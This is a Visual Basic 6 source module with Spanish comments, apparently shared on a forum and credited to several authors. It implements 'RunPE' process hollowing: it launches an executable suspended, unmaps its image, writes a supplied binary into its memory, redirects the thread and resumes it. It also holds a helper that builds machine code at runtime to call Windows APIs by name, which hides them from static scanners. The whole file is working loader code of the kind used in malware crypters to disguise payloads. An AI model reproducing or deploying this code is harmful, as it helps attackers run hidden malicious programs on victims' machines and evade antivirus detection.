Descripción: RunPe + CallApiByName
Autor: Jhonjhon_123 - [J.J.G.P]
Código: Seleccionar todo
Option Explicit
' ****************************************************************************************************************************** '
'
' --- Autor: Jhonjhon_123 (Jhon Jairo Pro Developer)
' --- Descripción: RunPe + CallApiByName
' --- Distribución: Libre
' --- Terminos De Uso:
' --- Prohibida su comercialización.
' --- No Debe eliminar los creditos.
'
' --- Funciones:
' --- IniciarDDLL()
' - Inicializa la configuración
'
' --- Public Sub ExecuteBytes(sName As String, bBytes() As Byte)
' - RunPE
' * sName: Ruta al exe
' * bBytes: Bytes a ejecutar
'
' ****************************************************************************************************************************** '
Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)
Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long
Dim bMoveMem(36) As Byte
Public Sub IniciarDDLL()
Dim vTMP As Variant
Dim D As Long
For Each vTMP In Array(&H55, &H8B, &HEC, &H56, &H57, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1, &HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H20)
bMoveMem(D) = CByte(vTMP): D = D + 1
Next
End Sub
'By Cobein
Function Call_(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
On Error Resume Next
Dim lPtr As Long
Dim bvASM(&HEC00& - 1) As Byte
Dim i As Long
Dim lMod As Long
lMod = GetProcAddress(LoadLibraryA(sLib), sMod)
If lMod = 0 Then Exit Function
lPtr = VarPtr(bvASM(0))
RtlMoveMemory ByVal lPtr, &H59595958, &H4: lPtr = lPtr + 4
RtlMoveMemory ByVal lPtr, &H5059, &H2: lPtr = lPtr + 2
For i = UBound(Params) To 0 Step -1
RtlMoveMemory ByVal lPtr, &H68, &H1: lPtr = lPtr + 1
RtlMoveMemory ByVal lPtr, CLng(Params(i)), &H4: lPtr = lPtr + 4
Next
RtlMoveMemory ByVal lPtr, &HE8, &H1: lPtr = lPtr + 1
RtlMoveMemory ByVal lPtr, lMod - lPtr - 4, &H4: lPtr = lPtr + 4
RtlMoveMemory ByVal lPtr, &HC3, &H1: lPtr = lPtr + 1
Call_ = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0)
End Function
' By Strike Bot
Public Sub MoveMemory(ByVal lpDestino As Long, ByVal lpSource As Long, ByVal cBytes As Long)
Call CallWindowProcA(VarPtr(bMoveMem(0)), lpDestino, lpSource, cBytes, 0)
End Sub
' By Jhonjhon_123
Public Sub ExecuteBytes(sName As String, bBytes() As Byte)
On Error Resume Next
Dim bIdh(63) As Byte ' IMAGE_DOS_HEADER
Dim bInh(247) As Byte ' IMAGE_NT_HEADERS
Dim bIsh(39) As Byte ' IMAGE_SECTION_HEADER
Dim bPi(15) As Byte ' PROCESS_INFORMATION
Dim bSi(67) As Byte ' STARTUPINFO
Dim bCtx(203) As Byte ' CONTEXT86
Dim e_lfanew As Long
Dim ImageBase As Long
Dim hProcess As Long
Dim hThread As Long
Dim SizeOfImage As Long
Dim SizeOfHeaders As Long
Dim AddressOfEntryPoint As Long
Dim NumberOfSections As Integer
Dim VirtualAddress As Long
Dim PointerToRawData As Long
Dim SizeOfRawData As Long
Dim Ebx As Long
Dim Eax As Long
Dim lTemp As Long
Dim D As Long
lTemp = 68
MoveMemory VarPtr(bSi(0)), VarPtr(lTemp), 4&
lTemp = &H10007
MoveMemory VarPtr(bCtx(0)), VarPtr(lTemp), 4&
MoveMemory VarPtr(bIdh(0)), VarPtr(bBytes(0)), 64&
MoveMemory VarPtr(e_lfanew), VarPtr(bIdh(60)), 4&
MoveMemory VarPtr(bInh(0)), VarPtr(bBytes(e_lfanew)), 248&
MoveMemory VarPtr(ImageBase), VarPtr(bInh(52)), 4&
MoveMemory VarPtr(SizeOfImage), VarPtr(bInh(80)), 4&
MoveMemory VarPtr(SizeOfHeaders), VarPtr(bInh(84)), 4&
MoveMemory VarPtr(AddressOfEntryPoint), VarPtr(bInh(40)), 4&
MoveMemory VarPtr(NumberOfSections), VarPtr(bInh(6)), 2&
Call Call_("kernel32", "CreateProcessW", 0, StrPtr(sName), 0, 0, 0, &H4, 0, 0, VarPtr(bSi(0)), VarPtr(bPi(0)))
MoveMemory VarPtr(hProcess), VarPtr(bPi(0)), 4&
MoveMemory VarPtr(hThread), VarPtr(bPi(4)), 4&
Call Call_("ntdll", "NtUnmapViewOfSection", hProcess, ImageBase)
Call Call_("kernel32", "VirtualAllocEx", hProcess, ImageBase, SizeOfImage, &H1000& Or &H2000&, &H40)
Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase, VarPtr(bBytes(0)), SizeOfHeaders, 0)
For D = 0 To NumberOfSections - 1
MoveMemory VarPtr(bIsh(0)), VarPtr(bBytes(e_lfanew + 248& + 40& * D)), 40&
MoveMemory VarPtr(VirtualAddress), VarPtr(bIsh(12)), 4&
MoveMemory VarPtr(SizeOfRawData), VarPtr(bIsh(16)), 4&
MoveMemory VarPtr(PointerToRawData), VarPtr(bIsh(20)), 4&
Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase + VirtualAddress, VarPtr(bBytes(PointerToRawData)), SizeOfRawData, 0)
Next
Call Call_("kernel32", "GetThreadContext", hThread, VarPtr(bCtx(0)))
MoveMemory VarPtr(Ebx), VarPtr(bCtx(164)), 4&
Call Call_("kernel32", "WriteProcessMemory", hProcess, Ebx + 8&, VarPtr(ImageBase), 4&, 0)
lTemp = ImageBase + AddressOfEntryPoint
MoveMemory VarPtr(bCtx(176)), VarPtr(lTemp), 4&
Call Call_("kernel32", "SetThreadContext", hThread, VarPtr(bCtx(0)))
Call Call_("kernel32", "ResumeThread", hThread)
End Sub
